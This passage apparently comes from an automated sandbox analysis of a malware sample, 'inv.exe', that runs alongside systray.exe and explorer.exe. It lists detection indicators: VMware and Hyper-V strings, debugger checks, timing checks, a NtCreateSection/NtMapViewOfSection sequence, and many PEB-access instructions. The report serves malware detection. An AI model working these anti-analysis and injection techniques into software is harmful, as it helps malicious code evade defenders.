          Source: explorer.exe, 00000003.00000000.260426292.00000000069DA000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD002
          Source: explorer.exe, 00000003.00000000.259290184.00000000059C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.259290184.00000000059C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.259290184.00000000059C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\inv.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\inv.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\systray.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\inv.exe | Code function: 2_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_00992183 IsDebuggerPresent,OutputDebugStringW,
          Source: C:\Users\user\Desktop\inv.exe | Code function: 0_2_00971120 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetConsoleWindow,ShowWindow,LoadLibraryA,RpcMgmtEpEltInqBegin,NtCreateSection,NtMapViewOfSection,CloseHandle,CallWindowProcW,
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009950BD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00971000 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_0097B073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_0099519E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_0097B101 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00995100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00995143 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009952A8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_009952EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_00995264 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 0_2_0099531D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_009950BD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00971000 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0097B073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0099519E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0097B101 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00995100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00995143 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_009952A8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_009952EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_00995264 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\inv.exeCode function: 2_2_0099531D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04832581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04832581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04832581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04832581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04802D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04802D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04802D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04802D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04802D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04831DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04831DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04831DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04886DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048B8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04813D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048CE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04834D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04834D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04834D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0488A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04843D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04883540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048B3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04827D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04848EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048BFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04838E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048BFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04817E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04817E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04817E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04817E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04817E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04817E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04818794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04887794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04887794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04887794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04804F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04804F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04809080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04883884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04883884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0489B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04887016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04887016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04887016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04820050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04820050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048D1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04832990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048C49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04809100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04809100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04809100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04824120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04824120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04824120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04824120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04824120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0482B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0480B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_048052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0481AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_0483FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04832ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04832AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04818A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 5_2_04805210 mov eax, dword ptr fs:[00000030h]
